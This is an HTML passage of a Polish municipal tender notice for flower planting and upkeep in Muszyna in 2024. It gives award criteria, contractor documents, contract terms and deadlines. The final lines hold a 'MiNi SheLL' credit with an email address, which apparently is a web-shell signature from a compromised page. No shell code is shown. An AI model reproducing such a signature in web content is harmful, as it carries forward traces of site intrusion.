kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Urządzenie, pielęgnacja i utrzymanie ukwiecenia na terenie Miasta i Gminy Uzdrowiskowej Muszyna w roku 2024”.<br/>Obsada figur kwiatowych – zastosowane rośliny powinny nadawać figurom charakterystyczny i dopasowany do ich indywidualnego kształtu wygląd. Przed przystąpieniem do sadzeń, konieczne jest uzupełnienie ewentualnych ubytków w wypełnieniu figur poprzez zastosowanie odpowiedniej mieszanki, która wspomoże rozwój roślin oraz zapobiegnie ich wypadaniu. Prace pielęgnacyjne powinny obejmować podlewanie, odchwaszczanie, nawożenie nawozami mineralnymi oraz uzupełnianie sadzonek uschniętych, przekwitniętych lub uszkodzonych przez zwierzęta i osoby trzecie. Należy również przeprowadzać regularne kontrole oraz podejmować działania zmierzające do utrzymania roślin w dobrej kondycji zdrowotnej. Rośliny tracące swoje walory estetyczne należy zastąpić nowymi.<br/>Zadanie nr 3: Obsada figur kwiatowych<br/>Etapy prac:<br/>1)	Obsada figur kwiatowych - materiałem własnym Wykonawcy.<br/>2)	Całosezonowa pielęgnacja obsadzonych figur kwiatowych.<br/>3)	Likwidacja obsady i uprzątnięcie terenu wokół figur. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77300000-3 - Usługi ogrodnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-07</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1: Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę<br/>Wzór: C = [(Cn/Cb)*60]<br/>C – łączna liczba punktów otrzymanych za kryterium cena brutto<br/>Cn – cena najniższa brutto<br/>Cb – cena wynikająca z oferty badanej brutto<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/><br/>Kryterium nr 2: Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia<br/><br/>Punktacja za doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia przyznana zostanie jeżeli osoba ta wykonała należycie zadanie polegające na: obsadzeniu donic i/lub wież kwiatowych i/lub gazonów i/lub rabat kwiatowych i/lub figur kwiatowych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy, to w tym okresie i że usługi te zostały wykonane należycie oraz że dedykowana osoba jest/była ich autorem.<br/><br/>Punktacja za doświadczenie w/w osoby przyznawana będzie w następujący sposób:<br/>Wykonanie 1 obsadzenia w powyższym zakresie - 10 pkt <br/>Wykonanie 2 - 3 obsadzeń w powyższym zakresie - 20 pkt <br/>Wykonanie 4 - 5 obsadzeń w powyższym zakresie - 30 pkt <br/>Wykonanie 6 i więcej obsadzeń w powyższym zakresie - 40 pkt <br/><br/>W celu otrzymania punktów w ramach niniejszego kryterium z treści dokumentów przedłożonych przez Wykonawcę musi jednoznacznie wynikać, że wykazane zadania zostały wykonane należycie i prawidłowo ukończone.<br/>Zamawiający przyzna wykonawcy 0 pkt w ramach niniejszego kryterium w następujących sytuacjach: <br/>1)	nieprzedłożenia wraz z ofertą dowodów potwierdzających że wykazane zdania zostały wykonane w okresie ostatnich 5 lat przed upływem terminu składnia ofert i/lub że zostały wykonane należycie i/lub że dedykowana osoba była ich autorem,<br/>2)	niewykazania doświadczenia osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia.<br/><br/>UWAGA: <br/>Dowody potwierdzające, że wykazane zadania zostały wykonane należycie, w terminie 5 lat przed upływem terminu składania ofert oraz, że dedykowana osoba była ich autorem muszą zostać załączone przez wykonawcę do oferty, gdyż dokumenty te nie podlegają złożeniu ani uzupełnieniu na późniejszym etapie postępowania o udzielenie zamówienia publicznego.<br/>Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+D<br/>P – ostateczna liczba punktów<br/>C - liczba punktów otrzymana za kryterium cena brutto<br/>D - liczba punktów otrzymana za kryterium doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby, którą Wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający na podstawie §3 Rozporządzenia , będzie żądał dostarczenia:<br/>Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (załącznik nr 1 do SWZ) wraz z dowodami potwierdzającymi kryterium „Doświadczenie osoby, którą wykonawca dysponuje do wykonania niniejszego zamówienia i która będzie uczestniczyła w realizacji przedmiotu zamówienia” oraz Formularz ofertowy - szczegółowy wykaz (załącznik nr 1A do SWZ).<br/>2. Oświadczenie, o którym mowa w pkt. 6.1 SWZ (załącznik nr 2 do SWZ) oraz 6.2 SWZ (załącznik nr 5 do SWZ – jeżeli dotyczy). <br/>3. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>4. Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z dokumentów załączonych do oferty). <br/>5. Zobowiązanie podmiotu udostępniającego zasoby – (załącznik nr 4 do SWZ) - jeżeli dotyczy. <br/><br/>*Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt. 6.1 SWZ – w art. 125 ust. 1 ustawy, składane zgodnie z załącznikiem nr 2 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia w zakresie, w jakim każdy z Wykonawców podlega wykluczeniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego, w tym ewentualne treści dotyczące zmian do umowy, stanowią załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-08 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania przedmiotu zamówienia:<br/>Dotyczy Zadania nr 1: Obsada donic, wież kwiatowych oraz gazonów.<br/>1)	Obsada donic wiszących, kamiennych, balkonowych oraz gazonów i wież kwiatowych - materiałem własnym Wykonawcy do 31 maja 2024 r. od dnia podpisania umowy.<br/>2)	Całosezonowa pielęgnacja obsady donic wiszących, kamiennych, balkonowych oraz gazonów i wież kwiatowych do 31 października 2024 r.<br/>3)	Likwidacja wykonanej obsady i uprzątnięcie terenu po prowadzonych pracach do 07 listopada 2024 r.<br/>Dotyczy Zadania nr 2: Obsada rabat kwiatami.<br/>1)	Obsada rabat kwiatami - materiałem własnym Wykonawcy do 03 czerwca 2024 r.<br/>2)	Całosezonowa pielęgnacja wykonanych rabat kwiatowych do 31 października 2024 r. <br/>3)	Likwidacja obsady, uprzątnięcie, przekopanie i wyrównanie terenu do 07 listopada 2024 r. <br/>Dotyczy Zadania nr 3: Obsada figur kwiatowych.<br/>1)	Obsada figur kwiatowych - materiałem własnym Wykonawcy do 21 czerwca 2024 r .<br/>2)	Całosezonowa pielęgnacja obsadzonych figur kwiatowych do 31 października 2024 r.<br/>3)	Likwidacja obsady i uprzątnięcie terenu wokół figur do 07 listopada 2024 r.<br/><br/>Zamawiający informuje, iż Wykluczeniu podlega Wykonawca o którym mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Z uwagi na ograniczenia techniczne co do możliwości zastosowania znaków, Zamawiający informuje, iż szczegółowy opis przedmiotu zamówienia i warunków jego wykonania określono w SWZ i załącznikach stanowiących jej integralną część.

Creat By MiNi SheLL
Email: jattceo@gmail.com